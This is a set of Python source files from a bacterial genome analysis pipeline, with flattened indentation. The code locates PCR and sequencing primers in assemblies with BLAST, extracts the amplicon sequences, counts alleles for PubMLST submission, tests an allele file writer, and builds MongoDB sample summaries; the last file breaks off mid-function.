import sys
import genomeOrganizer
import utilities
import tempfile
# from subprocess import call, DEVNULL
from Bio.Blast.Applications import NcbiblastnCommandline
from Bio import SeqIO
from Bio.Seq import Seq
from Bio.SeqRecord import SeqRecord
from Bio.Alphabet import IUPAC
from BLASThelpers import makeblastdb, loadBLASTtableToDataFrame,blankBLASTtable
from shutil import copytree
# _primer_file = 'settings/sample-primers.csv'
default_verbose = __name__ == "__main__"
current_verbose = default_verbose
script_version=1
script_subversion = 5
def vprint(text):
if current_verbose:
print(text)
def print(text):#pylint: disable=redefined-builtin
export_text = "{}".format(text)
if __name__ != "__main__":
export_text = "\t"+export_text
sys.stdout.write(export_text+"\n")
def read_file_to_dict(filename):
primer_cols = ['Locus','Role','Region','Name','Direction','Sequence']
primer_frame = pd.read_table(filename,comment='#',dtype=str,skip_blank_lines=True) #skip blank lines is true by default
###Skip blank lines does not work
primer_frame = primer_frame.dropna(how='all')
primer_frame['Direction'].fillna('',inplace=True)
primer_frame['Region'].fillna('All',inplace=True)
primer_dict = dict()
for _, row in primer_frame.iterrows():
##Parse
locus = row['Locus']
region = row['Region']
primer = row['Name']
sequence = row['Sequence']
direction = row['Direction']
##Role can be a list
function = []
role = row['Role']
if re.match('PCR',role,re.IGNORECASE):
function = ['PCR']
elif re.match('Seq',role,re.IGNORECASE):
function = ['Seq']
elif re.match('All',role,re.IGNORECASE):
function = ['PCR','Seq']
else: ##Did not find function, use for both steps
function = ['PCR','Seq']
vprint("Did not identify function of primer {} -- use for both PCR and Seq".format("-".join([locus,primer])))
vprint('To assign a function, write "PCR", "Seq", or "All" in the second column')
##Construct dict of dict
if locus not in primer_dict:
primer_dict[locus] = dict()
locus_dict = primer_dict[locus]
for f in function: #Add data to both PCR and Seq if appropriate
if f not in locus_dict:
locus_dict[f] = dict()
function_dict = locus_dict[f]
if region not in function_dict:
function_dict[region] = dict()
region_dict = function_dict[region]
region_dict[primer] = sequence
##TODO add direction
#
#
# _primer_dict = dict() ## Dict of Dicts: locus, function (PCR,Seq),region,name,sequence
# with open(filename) as primers:
# p_reader = csv.reader(primers)
# p_reader = [row for row in p_reader if not row[0].startswith('#')] #strip comments
# for row in p_reader:
# row = [item for item in row if item != ''] #strip empy strings
# if len(row) > 0:
# vprint("Parsing row with {} items".format(len(row)))
# ##First is locus name -- no exception
# locus = row[0]
# ##Last is sequence -- no exception
# sequence = row[-1].replace(" ","")
# ##Second to last is primer name -- no exception
# primer = row[-2]
# vprint("Name is {}-{}".format(locus,primer))
# ##Function and region are optional
# c_max = len(row) - 3 #last two indexes are used, so -3 is the maximum that is open
# c = 1
# ##Second could be function (PCR,Seq,All)
# if c <= c_max:
# function = []
# if re.match('PCR',row[c],re.IGNORECASE):
# function = ['PCR']
# c+=1
# elif re.match('Seq',row[c],re.IGNORECASE):
# function = ['Seq']
# c+=1
# elif re.match('All',row[c],re.IGNORECASE):
# function = ['PCR','Seq']
# c+=1
# else: ##Did not find function, use for both steps
# function = ['PCR','Seq']
# vprint("Did not identify function of primer {} -- use for both PCR and Seq".format("-".join([locus,primer])))
# vprint('To assign a function, write "PCR", "Seq", or "All" in the second column')
# region = 'All'
# if c <= c_max:
# region = row[c]
# if locus not in _primer_dict:
# _primer_dict[locus] = dict()
# locus_dict = _primer_dict[locus]
# for f in function: #Add data to both PCR and Seq if appropriate
# if f not in locus_dict:
# locus_dict[f] = dict()
# function_dict = locus_dict[f]
# if region not in function_dict:
# function_dict[region] = dict()
# region_dict = function_dict[region]
# region_dict[primer] = sequence
# #~ print("Found primers for the following genes: "+";".join(_primer_dict.keys())) #Not accurate. Does not confirm that dict contains primers
return primer_dict
## map_primers_to_genome will use BLAST to identify where primers are likely to bind in the genome.
# _primer_dict is a primer heirarchy as returned by "read_file_to_dict"
# blast_db is the name of the genome db you want to search
# outfile is destination to write the blast results to. If outfile is given, we assume that you want details about where the primers map and will put minor warnings to stdout; otherwise, we assume you don't care and the are suppressed
# ## User can "cheat" by passing "range_from" and "range_to" integers in the locus dict.
# Returns : export_regions[locus][subregion][name] = {'contig','start','stop'} where start and stop are the first coordinates past the low and high primers
## Returns a dict with genome information (key in CAPS): isolate NAME, ORIGINAL filename, FASTA filename, blast DB name, contig SEQS
def setupGenomeForBlastBasedExtraction(genome_name,genome_file,tempDir,file_format = '',is_compressed = None):
##Genome information
genomeInfo = dict()
genomeInfo['name'] = genome_name
genomeInfo['original'] = genome_file #just for reporting
##Some people use weird genome filenames, so I need to copy it to something without special characters
temp_genome = os.path.join(tempDir,genome_name + '.fasta')
genomeOrganizer.exportGenomeFASTA(genome_file,temp_genome,file_format,is_compressed)
genomeInfo['fasta'] = temp_genome
if not os.path.isfile(genomeInfo['fasta']):
raise IOError("Illegitimate file at "+genomeInfo['fasta'])
#~ genomeDir,genomeFile = os.path.split(os.path.abspath(genomeInfo['fasta']))
#open the genome file for extracting sequences
genome_handle = utilities.flexible_handle(genomeInfo['original'], is_compressed, 'rt')
genomeInfo['seqs'] = SeqIO.to_dict(SeqIO.parse(genome_handle, file_format))
print("{} bp in {} contig(s)".format(sum([len(c) for c in genomeInfo['seqs'].values()]),len(genomeInfo['seqs']))) ##Appends to sequence identifier line
if len(genomeInfo['seqs']) == 0:
raise ValueError("No sequences parsed from file {}".format(genomeInfo['fasta']))
genome_handle.close()
# make search database for genome
db_base = os.path.basename(genomeInfo['fasta'])
genomeInfo['db'] = os.path.join(tempDir,db_base)
makeblastdb(genomeInfo['fasta'],genomeInfo['db'])
return genomeInfo
class AmpliconExtractor:
def __init__(self,primer_file,working_dir=None,generate_output=False):
### Make writable directories
if working_dir is None:
working_dir = os.getcwd()
##utilities.safeMakeOutputFolder(os.path.join(working_dir,'AmpExtTemp'))
self.generate_output = generate_output
self.primers_dict = read_file_to_dict(primer_file)
if generate_output:
self.outDir = utilities.safeMakeOutputFolder(os.path.join(working_dir,'AmpliconExtractor'))
self.sequence_files = {locus: os.path.join(self.outDir,'{}_primer-extracted_sequences.fasta'.format(locus)) for locus in self.primers_dict.keys()}
self.amplicon_info_file = os.path.join(self.outDir,'amplicon_information.tab')
self.tempDirObj = tempfile.TemporaryDirectory(suffix='_AmpExt', prefix='tmp', dir=self.outDir)
else:
self.outDir = self.sequence_files = self.amplicon_info_file = None
self.tempDirObj = tempfile.TemporaryDirectory(suffix='_AmpExt', prefix='tmp', dir=working_dir)
self.amplicon_info_list = []
##Full service function for a single genome
def evaluateGenome(self,genome_name,genome_file,file_format = '',is_compressed = None, keep_temp = False):
print("## Begin searching sequence {} ## ".format(genome_name))
primer_hit_file = None
if self.outDir is not None:
primer_hit_file = os.path.join(self.outDir,'primer_hits.tab')
primer_hit_file = utilities.appendToFilename(primer_hit_file, genome_name)
genomeInfo = setupGenomeForBlastBasedExtraction(genome_name,genome_file,self.tempDirObj.name,file_format,is_compressed)
amplicon_info = {'Filename':genome_file,"Lab_ID":genome_name}
primers_loc = self.map_primers_to_genome(genomeInfo['db'],primer_hit_file,keep_temp=keep_temp)
for locus, locus_dict in primers_loc.items():
for subregion, subregion_dict in locus_dict.items():
if isinstance(subregion_dict,dict): ##Sequencing features
for name,locations in subregion_dict.items():
print('Seq name :'+ name)
contig = locations['contig']
print('On contig: '+contig)
contig_seq = genomeInfo['seqs'][contig]
print('Found contig: {}, length {}'.format(contig_seq.id,len(contig_seq)))
start = locations['start']
print('Start: {}'.format(start))
stop = locations['stop']
print('Stop: {}'.format(stop))
my_seq = contig_seq[start:stop+1]
new_name = name.replace(' ','_')
my_seq.id = new_name
my_seq.description ="{}:{}-{}".format(contig,start,stop)
# my_fasta = SeqRecord(my_seq,id=name.replace(' ','_'),description="{}:{}-{}".format(contig,start,stop))
if self.sequence_files is not None:
with open(self.sequence_files[locus],"a") as fout:
SeqIO.write(my_seq,fout,'fasta')
if file_format == 'fastq':
fastq_file = utilities.setExt(self.sequence_files[locus], 'fastq', False)
with open(fastq_file,'a') as fastq_out:
SeqIO.write(my_seq,fastq_out,'fastq')
elif subregion == 'OuterRange': ##Original amplicon...actually a range
range_list = subregion_dict
for item in range_list:
assert isinstance(item,region_record)
if len(range_list) == 1:
rr = range_list[0]
amplicon_info['{}_PCR_size'.format(locus)] = "{}".format(rr.get_max() - rr.get_min() + 1)
amplicon_info['{}_contig'.format(locus)] = "{}".format(rr.contig)
amplicon_info['{}_start_position'.format(locus)] = "{}".format(rr.get_min())
amplicon_info['{}_stop_position'.format(locus)] = "{}".format(rr.get_max())
#TODO: report something
else:
print("Warning feature {} not reported for locus {}".format(subregion,locus))
self.amplicon_info_list.append(amplicon_info)
##Returns a dict with entry for every locus that was searched for
#Tolerance keeps hits with bit-scores at tolerance*max_score
def map_primers_to_genome(self,blast_db,outfile=None,search_set=None,default_to_PCR=False,temp_dir = None, keep_temp=False, tolerance=1):
workingDir = temp_dir if temp_dir is not None else self.tempDirObj.name
if outfile == '':
outfile = None
if search_set == None:
search_set = set(self.primers_dict.keys())
temp_infile = os.path.join(workingDir,'tmp_primer.fasta')
temp_outfile = os.path.join(workingDir,'tmp_primer_blast.fasta')
blast_combined = blankBLASTtable()
ql_head = 'query_length' #new column to add
fh_head = 'forward hit'
export_regions = dict() #name for region, coordinates of innermost nucleotide on outermost primers (draw data from seq_borders dict in the sequencing reaction)
for locus in search_set:
if locus not in self.primers_dict.keys():
print("Error: {} is not in the set of primer loci".format(locus))
locus_dict = self.primers_dict[locus].copy() #so that I can modify it
if default_to_PCR: #Make sure there are primers for sequencing the entire region
seq_dict = locus_dict['Seq']
if 'All' not in seq_dict.keys():
seq_dict['All'] = locus_dict['PCR']['All']
export_regions[locus] = dict()
##Evaluate PCR dict first to find general range in which sequencing primers can bind
PCR_dict = locus_dict['PCR']
range_list = []
## Create a master range limit if specified
has_range = ('range_contig' in locus_dict.keys()
and 'range_from' in locus_dict.keys()
and 'range_to' in locus_dict.keys())
if has_range:
master_range = region_record(locus_dict['range_contig'],locus_dict['range_from'],locus_dict['range_to'])
range_list.append(master_range)
## Place BLAST hits into ranges
for (subregion, subregion_dict) in PCR_dict.items(): ##Only one region: "all"
for (primer,sequence) in subregion_dict.items():
#Write query file
my_seq = SeqRecord(Seq(sequence,IUPAC.ambiguous_dna),id="-".join([locus,'PCR',subregion,primer]))
with open(temp_infile,"w") as fout:
SeqIO.write(my_seq,fout,'fasta')
#Search BLAST
blast_cline = NcbiblastnCommandline(query=temp_infile,db=blast_db,outfmt=6,out=temp_outfile,task='blastn-short',evalue=1,reward=1,penalty=-1,gapopen=3,gapextend=2)
blast_cline() ##Should only print for errors
blast_table = loadBLASTtableToDataFrame(temp_outfile)
if keep_temp:
named_file = '{}_{}.tab'.format("-".join([locus,'PCR',subregion,primer]),os.path.basename(blast_db))
utilities.safeOverwriteTable(os.path.join(workingDir,named_file), blast_table, 'tab')
##SPlace best hits into ranges
if len(blast_table) > 0:
##Add some extra info to table
blast_table[ql_head] = len(my_seq)
blast_table[fh_head] = blast_table['s. start'] < blast_table['s. end']
## Limit table to best hits
best = blast_table.sort_values(by=['bit score'],ascending=False).iloc[0]
best_table = blast_table[blast_table['bit score'] >= tolerance*best['bit score']] #This may be too stringent; may need to revisit
## Add best hits to ranges
for _,this_hit in best_table.iterrows():
finished = False #if we found a range for it
for this_range in range_list:
if not finished: #stop upon success or if range is exclusive
finished = this_range.try_add_primer(this_hit['subject id'],this_hit['s. start'],this_hit[fh_head],True)
if this_range.exclusive and not finished:
finished = True
if len(best_table) == 1:
print("Warning: an exclusive hit failed to map to the prespecified region. Please report to developer(s)")
if not finished:
new_range = region_record()
new_range.try_add_primer(this_hit['subject id'],this_hit['s. start'],this_hit[fh_head],True)
range_list.append(new_range)
## Record best hits for reporting
blast_combined = pd.concat([blast_combined,best_table],sort=True)##Note: this is compatible with pandas 0.23 +; older versions will fail. Without sort, it makes FutureWarning and exception.
else:
print("Warning: zero hits for {}".format(my_seq.id))
##Merge any ranges that are close/overlapping; test if ranges are valid (primer pairs)
i = 0
ValidRanges = set()
while i < len(range_list):
this_range = range_list[i]
j = len(range_list)-1
while j > i:
merger = this_range.try_merge_regions(range_list[j])
if merger:
print("Warning: this is an exceptional situation and has not been tested, please report to developer(s). Range merger")
del(range_list[j])
j-=1
#Test validity of this_range
if (len(this_range.For_list) > 0 and len(this_range.Rev_list) > 0):
if this_range.get_min() < this_range.get_max():
ValidRanges.add(i)
i+=1
#Remove invaled ranges
range_list = [range_list[i] for i in ValidRanges]
#Report oddities
if len(range_list) == 0:
print("Warning: Unable to find an amplification region for {}".format(locus))
elif len(range_list) == 2:
print("Warning: Detected multiple amplification regions for {}".format(locus))
for this_range in range_list:
vprint('\n'+locus + ": Potential amplicon region")
vprint(this_range)
## Find the sequencing sites within the defined ranges
Seq_dict = locus_dict['Seq']
for (subregion, subregion_dict) in Seq_dict.items():
export_regions[locus][subregion] = dict()
seq_borders = dict() ##Use range as key to track where sequencing of subregion starts. Values outside of range indicate no matches
seq_primers = dict() ##primer names corresponding to border positions
for (primer,sequence) in subregion_dict.items():
my_seq = SeqRecord(Seq(sequence,IUPAC.ambiguous_dna),id="-".join([locus,'Seq',subregion,primer]))
with open(temp_infile,"w") as fout:
SeqIO.write(my_seq,fout,'fasta')
blast_cline = NcbiblastnCommandline(query=temp_infile,db=blast_db,outfmt=6,out=temp_outfile,task='blastn-short',evalue=1,reward=1,penalty=-1,gapopen=3,gapextend=2)
blast_cline() ##Should only print for errors
blast_table = loadBLASTtableToDataFrame(temp_outfile)
if len(blast_table) > 0:
##Add some extra info to table
blast_table[ql_head] = len(my_seq)
blast_table[fh_head] = blast_table['s. start'] < blast_table['s. end']
for my_range in range_list:
## Limit table to hits in range
r_min = my_range.get_min()
r_max = my_range.get_max()
if my_range not in seq_borders: ##TODO: this should probably be initialized immediately after declaration. Need to check that it doesnt' break the downstream features
seq_borders[my_range] = [r_min -1, r_max+1]
seq_primers[my_range] = ['None','None']
range_table = blast_table[blast_table['subject id'] == my_range.contig]
range_table = range_table[range_table['s. end'] >= r_min]
range_table = range_table[range_table['s. end'] <= r_max]
if len(range_table) > 0:
## Limit table to best hits
best_in_range = range_table.sort_values(by=['bit score'],ascending=False).iloc[0]
range_table = range_table[range_table['bit score'] >= best_in_range['bit score']] #This may be too stringent; may need to revisit
if len(range_table) > 0:
if len(range_table) > 1:
export_line = "Warning: sequencing primer maps to multiple locations within PCR primers. Using outermost site: {}".format(my_seq.id)
# if __name__ != "__main__": ##Being called from an outside procedure...indent to indicated subsidiary position
# export_line = '\t'+export_line
print(export_line)
for _, hit in range_table.iterrows():
q_end = hit['q. end']
gap = len(my_seq) - q_end
s_end = hit['s. end']
is_for = hit[fh_head]
if is_for:
if seq_borders[my_range][0] < my_range.get_min():
seq_borders[my_range][0] = s_end
seq_primers[my_range][0] = primer
if gap > 0:
vprint("Warning: sequencing primer does not match template at 3' end. Sequence probably needs trimming on the low end: {}".format(my_seq.id))
else:
if seq_borders[my_range][0] > s_end:
seq_borders[my_range][0] = s_end
seq_primers[my_range][0] = primer
if gap > 0:
vprint("Warning: sequencing primer does not match template at 3' end. Sequence probably needs trimming on the low end: {}".format(my_seq.id))
vprint("Warning: multiple sequencing primers map in forward direction on template. Using outermost site: {}".format("-".join([locus,'Seq',subregion,seq_primers[my_range][0]])))
else:
if seq_borders[my_range][1] > my_range.get_max():
seq_borders[my_range][1] = s_end
seq_primers[my_range][1] = primer
if gap > 0:
vprint("Warning: sequencing primer does not match template at 3' end. Sequence probably needs trimming on the high end: {}".format(my_seq.id))
else:
if seq_borders[my_range][1] < s_end:
seq_borders[my_range][1] = s_end
seq_primers[my_range][1] = primer
if gap > 0:
vprint("Warning: sequencing primer does not match template at 3' end. Sequence probably needs trimming on the high end: {}".format(my_seq.id))
vprint("Warning: multiple sequencing primers map in reverse direction on template. Using outermost site: {}".format("-".join([locus,'Seq',subregion,seq_primers[my_range][1]])))
else:
print("Warning: sequencing primer failed to map within PCR primers: {}".format(my_seq.id))
## Record best hits for reporting
best_table = blast_table[blast_table['bit score'] >= best_in_range['bit score']] #This may be too stringent; may need to revisit
#~ print("Identified {} hits above threshold used for best in range".format(len(best_table)))
blast_combined = pd.concat([blast_combined,best_table],sort=True) ##Note: this is compatible with pandas 0.23 +; older versions will fail.
else:
print("Warning: sequencing primer does not map to within PCR product. Exporting all matches for {}".format(my_seq.id))
blast_combined = pd.concat([blast_combined,blast_table],sort=True) ##Note: this is compatible with pandas 0.23 +; older versions will fail.
##Export sequencing start sites
basename = locus
if subregion != 'All':
basename += '_' + subregion
for my_range in range_list:
if my_range in seq_primers:
name = basename
name += '_{}_{}_{}'.format(seq_primers[my_range][0],seq_primers[my_range][1],os.path.basename(os.path.splitext(blast_db)[0])) ##Convoluted way to get the genome name
export_regions[locus][subregion][name] = {'contig':my_range.contig,'start':seq_borders[my_range][0]+1,'stop':seq_borders[my_range][1]-1}
else: ##seq_primers never got initialized because there is no match.
print("Notice: No sequencing primers for {} mapped with in the defined range for {}.".format(subregion,locus))
#I could add a way to orient the sequences (identify a reference primer)
export_regions[locus]['OuterRange'] = range_list
os.remove(temp_infile)
os.remove(temp_outfile)
if outfile != None:
blast_combined.to_csv(outfile,index=False) ##columns=blast_default_headers+[ql_head,fh_head]
export_line = 'Exported primer locations to '+outfile
# if __name__ != "__main__": ##Being called from an outside procedure...indent to indicated subsidiary position
# export_line = '\t'+export_line
print(export_line)
# current_verbose = default_verbose
return export_regions
def finish(self,keep_temp=False):
if self.amplicon_info_file is not None:
utilities.safeOverwriteTable(self.amplicon_info_file,pd.DataFrame(data=self.amplicon_info_list),'tab',index=False)
if keep_temp:
copytree(self.tempDirObj.name,os.path.join(self.outDir,'temp'))
class region_record:
limit = 5000 #primers more than 5kb apart are considered different regions
def __init__(self,exclusive_contig=None,exclusive_start=None,exclusive_stop=None):
self.bestHitCounter = 0
self.For_list = []
self.Rev_list = []
self.contig = 'Not specified'
if exclusive_contig != None:
self.exclusive = True ##An exclusive range cannot expand
if exclusive_start >= exclusive_stop:
raise Exception("Region definition must start before stop")
self.contig = exclusive_contig
self.For_list.append(exclusive_start)
self.Rev_list.append(exclusive_stop)
else:
self.exclusive = False
if (exclusive_start != None) or (exclusive_stop != None):
raise Exception("Cannot define an exclusive region without a contig name")
def __str__(self):
Fcnt = len(self.For_list)
Rcnt = len(self.Rev_list)
minF = min(self.For_list) if Fcnt > 0 else "N/A"
maxR = max(self.Rev_list) if Rcnt > 0 else "N/A"
return ("Predefined Exclusive Search Range: {}\n"
"Contig: {} \n"
"Number of best hits: {}\n"
"Number of forward hits: {}\n"
"Number of reverse hits: {} \n"
"First forward hit: {} \n"
"Last reverse hit: {} \n".format(self.exclusive,self.contig,self.bestHitCounter,Fcnt,Rcnt,minF,maxR))
def __repr__(self):
return "region_record with {} primers".format(len(self.For_list+self.Rev_list))
def try_add_primer(self,this_contig,start,is_forward,best):
##Test if it is a new range
new = not self.exclusive and len(self.For_list) == 0 and len(self.Rev_list) == 0
##Test if it fits into an existing range
success = False
if new:
self.contig = this_contig
success = True
elif (this_contig == self.contig): #must be on same contig for starters
full_list = self.For_list + self.Rev_list
min_limit = min(full_list)
max_limit = max(full_list)
if not self.exclusive: ##An exclusive range cannot expand
min_limit -= region_record.limit
max_limit += region_record.limit
success = (start > min_limit) and (start < max_limit)
##Add primer if it fits into range
if success:
if best:
self.bestHitCounter += 1
if is_forward:
self.For_list.append(start)
else:
self.Rev_list.append(start)
return success
def try_merge_regions(self,other):
if self.exclusive or other.exclusive:
raise Exception("Exclusive ranges should never coexist with others")
full_list = self.For_list + self.Rev_list
min_limit = min(full_list)
max_limit = max(full_list)
min_limit -= region_record.limit #could store the value
max_limit += region_record.limit
other_all = other.For_list + other.Rev_list
other_min = min(other_all)
other_max = max(other_all)
success = (self.contig == other.contig
and (((other_max > min_limit) and (other_max < max_limit)) #other max is inside limits
or ((other_min > min_limit) and (other_min < max_limit)) # other_min is inside limits
or ((other_min < min_limit) == (other_max > max_limit)) # or one stradles the other
))
if success:
self.For_list.extend(other.For_list)
self.Rev_list.extend(other.Rev_list)
return success
#Test that list is not empty before calling
def get_min(self):
return min(self.For_list)
def get_max(self):
return max(self.Rev_list)
##Locate primers on genome, and extract the sequenced regions from within the amplicons
##This will fail if it is given funny genome filenames (spaces, etc)
import argparse
def main():
### Parse arguments
parser = argparse.ArgumentParser()
parser.add_argument('-p','--primer_file',help='Location of primer information',required=True)
parser.add_argument('-r','--repository',help='Location of genome assembly repository')
parser.add_argument('--keep_temp',action='store_true',help='Keep temporary BLAST files')
parser.add_argument('--version','-V',action='version',version='%(prog)s {}.{}'.format(script_version,script_subversion))
parser.add_argument('args', nargs=argparse.REMAINDER)
args = parser.parse_args()
argv = [os.path.basename(__file__)] + args.args
# stdout = utilities.Logger(os.path.join(_outDir,"LocusExtractor.log"))
repository = None
default_settings = os.path.join(os.path.dirname(__file__),genomeOrganizer.SETTING_FILE)
if args.repository:
repository = args.repository
gd = genomeOrganizer.placeAssembliesIntoDataFrame(argv,GO_settings=default_settings,repository=repository)
if gd is not None:
primer_file = args.primer_file
extractor = AmpliconExtractor(primer_file,generate_output=True)
logFile = os.path.join(extractor.outDir,"AmpliconExtractor.log") if extractor.outDir is not None else "AmpliconExtractor.log" ##TODO find a better default location
sys.stdout = utilities.Logger(logFile)
if extractor.outDir is not None:
utilities.safeOverwriteTable(genomeOrganizer.default_list(extractor.outDir), gd, 'tab')
for _,row in gd.iterrows():
(file_format,compressed) = utilities.guessFileFormat(row.loc['Filename'])
extractor.evaluateGenome(row.loc['Lab_ID'],row.loc['Filename'],file_format,compressed,keep_temp=args.keep_temp)
## If I have to sort the columns somewhat (from LocusExtractor -- should be a function)
# cols = self.allele_table_columns_initial + [c.strip() for c in column_order if c not in self.allele_table_columns_initial]
# remainder = [c.strip() for c in self.allele_table.columns.tolist() if c not in cols]
# remainder.sort(key=lambda s: s.lower())
# cols += remainder
extractor.finish(keep_temp=args.keep_temp)
print("Finished. Results saved at {}".format(extractor.outDir))
if __name__ == "__main__":
if not utilities.has_preferred_python():
raise Exception("Upgrade your python version")
main()
```
#### File: pipeline/locusextractor/new_allele_submission_tool.py
```python
from Bio import SeqIO
# import sys
# sys.path.append('/scicomp/home/ymw8/ML/tools/Utility/')
# sys.path.append('/scicomp/home/ymw8/ML/tools/LocusExtractor')
import utilities
from collections import defaultdict
import argparse
script_version = 0.1
script_subversion = 2
def main():
parser = argparse.ArgumentParser(description='A program to identify unique alleles for submission to PubMLST. Default behavior is to count the occurances of distinct sequences in a multi-fasta file',)
parser.add_argument('--version','-V',action='version',version='%(prog)s {}.{}'.format(script_version,script_subversion))
parser.add_argument('filename', help="Provide a multi-fasta file that needs to be analyzed. Designed for Locus Extrator's 'mismatch_DNA'")
parser.add_argument('--split',action='store_true', help="Separate sequences based on locus inferred from name before counting")
parser.add_argument('--save_split',action='store_true',help="Create multi-fasta files for each gene that is identified in the file")
parser.add_argument('--gene_part','-gp',type=int,default=1,help='Number of underscores preceeding the gene name in the output file')
args = parser.parse_args()
filename = args.filename
seqs = SeqIO.parse(filename,'fasta')
genelists = split_LE_mismatch_file(seqs,args.gene_part) if (args.split or args.save_split) else {'All':seqs}
for gene,g_seq in genelists.items():
if args.save_split:
outfile = utilities.appendToFilename(filename,"_"+gene)
print("Saving to "+outfile)
SeqIO.write(g_seq,outfile,'fasta')
g_counts = count_allele_occurances(g_seq)
for k,v in g_counts.items():
k.description = "{} observations".format(v)
count_outfile = utilities.appendToFilename(filename,"_"+gene+'_counts')
SeqIO.write([x for x in g_counts.keys()],count_outfile,'fasta')
##Seqs is an iterable that will produce SeqRecords
def split_LE_mismatch_file(seqs,gene_part):
genelists = defaultdict(list)
for s in seqs:
parts = s.id.split('_') ##This comes from LocusExtractor Genome_genome_similarityIinfo...
gene = parts[gene_part] if (len(parts[1]) > 0) else "partial_"+parts[2] ##Some genomes use underscore as replacement for single quote to indicate partial gene
if gene.startswith('-'): ##A hack from replacing underscore with dash (underscore being used as designation for partial since prime is illegal)
gene = gene.replace('-','partial_')
if gene[0].isupper(): ##Peptides are distinguished by upper case. I used an underscore in a gene name ... Hi_adk
gene += '_pep'
genelists[gene].append(s)
return genelists
##Seqs is an iterable that will produce SeqRecords
def count_allele_occurances(seqs):
allele_counts = defaultdict(int)
for s in seqs:
found = False
for r in allele_counts:
if str(s.seq) == str(r.seq):
allele_counts[r] += 1
found = True
print('{} matches {}'.format(s.id,r.id))
if not found:
allele_counts[s] += 1
return allele_counts
if __name__ == "__main__":
if not utilities.has_preferred_python():
raise Exception("Upgrade your python version")
main()
```
#### File: locusextractor/tests/AlleleWriterManagerTest.py
```python
import sys
sys.path.append('..')
from AlleleWriterManager import AlleleWriterManager
import unittest
from Bio.Seq import Seq
from Bio.SeqRecord import SeqRecord
from Bio import SeqIO
import os
class seq_utilitiesTest(unittest.TestCase):
def setUp(self):
self.s1 = 'GACTAGACTTAGT'
self.s2 = 'GACTATAACTTAATATAG'
self.s3 = 'GACTATAACTTAATATAC'
self.seq1 = Seq(self.s1)
self.seq2 = Seq(self.s2)
self.seq3 = Seq(self.s3)
self.sr1 = SeqRecord(self.seq1)
self.sr2 = SeqRecord(self.seq2)
self.sr3 = SeqRecord(self.seq3)
self.fastq2 = SeqRecord(self.seq2,"test",letter_annotations = {"phred_quality":[1,2,4,10,20,25,33,22,33,35,18,11,23,8,2,1,2,0]})
def test_fastq(self):
writer = AlleleWriterManager("WriterTests",set(['a','b','c']))
writer.writeToFile('a',self.fastq2)
fasta_name = os.path.join(writer.directory,"a_alleles.fasta")
self.assertTrue(os.path.exists(fasta_name),"Cannot find {}".format(os.path.abspath(fasta_name)))
with open(fasta_name) as fin:
seqs = SeqIO.to_dict(SeqIO.parse(fin,'fasta'))
self.assertEqual(len(seqs),1, "Should have a single sequence in {}".format(fasta_name))
fastq_name = os.path.join(writer.directory,"a_alleles.fastq")
self.assertTrue(os.path.exists(fastq_name),"Cannot find {}".format(os.path.abspath(fastq_name)))
with open(fastq_name) as fin:
seqs = SeqIO.to_dict(SeqIO.parse(fin,'fastq'))
self.assertEqual(len(seqs),1, "Should have a single sequence in {}".format(fastq_name))
writer.deleteFiles()
#
def test_multi(self):
writer = AlleleWriterManager("WriterTests",set(['a','b','c'])) ##Needs to write to a different folder
writer.writeToFile('a',self.seq1,name='seq1')
writer.writeToFile('a',self.seq2,name='seq2')
fasta_name = os.path.join(writer.directory,"a_alleles.fasta")
self.assertTrue(os.path.exists(fasta_name),"Cannot find {}".format(os.path.abspath(fasta_name)))
with open(fasta_name) as fin:
seqs = SeqIO.to_dict(SeqIO.parse(fin,'fasta'))
self.assertEqual(len(seqs),2, "Should have two sequences in {}".format(fasta_name))
writer.deleteFiles()
#
# def test_trimFASTQ(self):
# trimmed = trimFASTQtoFirstBase(self.fastq2, 10)
# self.assertEqual(self.seq2.find(trimmed.seq),3,"Left trim is wrong 1")
# self.assertEqual(self.seq2.reverse_complement().find(trimmed.seq.reverse_complement()),5,"Right trim in wrong")
# trimmed = trimFASTQtoFirstBase(self.fastq2, 40)
# self.assertEquals(trimmed,None,"Sequence should be discarded")
# trimmed = trimFASTQtoFirstBase(self.fastq2, 22)
# self.assertEqual(self.seq2.find(trimmed.seq),5,"Left trim is wrong 2")
# self.assertEqual(self.seq2.reverse_complement().find(trimmed.seq.reverse_complement()),5,"Right trim in wrong")
# trimmed = trimFASTQtoFirstBase(self.fastq2, 23)
# self.assertEqual(self.seq2.find(trimmed.seq),5,"Left trim is wrong 3")
# self.assertEqual(self.seq2.reverse_complement().find(trimmed.seq.reverse_complement()),5,"Right trim in wrong")
# trimmed = trimFASTQtoFirstBase(self.fastq2, 35)
# self.assertEqual(len(trimmed),1,"trimmed too long")
# self.assertEqual(trimmed[0],self.fastq2[10],"Wrong base recovered")
if __name__ == '__main__':
unittest.main()
```
#### File: BMGAP/pipeline/sample_summary_collection.py
```python
import sys
import re
import logging
import argparse
import pymongo
def main(db, identifier):
field_list = {
"identifier": "identifier",
"Lab_ID": "Lab_ID",
"Assembly_ID": "Assembly_ID",
"Run_ID": "Run_ID",
"QC_flagged": "QC_flagged",
"Submitter": "Submitter",
"assemblyPath": "assemblyPath",
"MLST": "MLST.ST",
"cc": "MLST.Nm_MLST_cc",
"Serotype": "Serotype.ST",
"Serogroup": "Serogroup.SG",
"location": "BML_Data.location",
"country": "BML_Data.country",
"year": "BML_Data.year",
"sample_type": "BML_Data.sample_type",
"sample_order": "sample_order",
"Species": "mash.Top_Species",
"sequence_flagged": "sequence_flagged",
"assembly_flagged": "assembly_flagged",
}
if identifier == "all":
summarize_all_samples(db, field_list)
elif identifier:
sample_summary = summarize_single_sample(db, identifier, field_list)
db.sample_summary.update_one(
{"identifier": identifier}, {"$set": sample_summary}, upsert=True
)
else:
print("Specify which identifier to make summary for")
sys.exit(2)
def summarize_all_samples(db, field_list):
all_identifiers = db.internal.find({}, {"identifier": 1, "_id": 0})
for identifier in all_identifiers:
logging.error(identifier)
sample_summary = summarize_single_sample(
db, identifier["identifier"], field_list
)
if sample_summary:
db.sample_summary.update_one(
{"identifier": identifier["identifier"]},
{"$set": sample_summary},
upsert=True,
)
for field in field_list.keys():
logging.error(field)
db.sample_summary.create_index(
[(field, pymongo.ASCENDING), (field, pymongo.DESCENDING)]
)
def summarize_single_sample(db, identifier, field_list):
new_sample_dict = {}
rec = db.internal.find_one({"identifier": identifier})
for name, field in field_list.items():
if re.search("\.", field):
fields = field.split(".")
if fields[0] in rec and fields[1] in rec[fields[0]]:
new_sample_dict[name] = rec[fields[0]][fields[1]]
elif field in rec:
new_sample_dict[name] = rec[field]
if new_sample_dict and "Run_ID" in new_sample_dict.keys():
logging.error(identifier)
logging.error(new_sample_dict["Run_ID"])
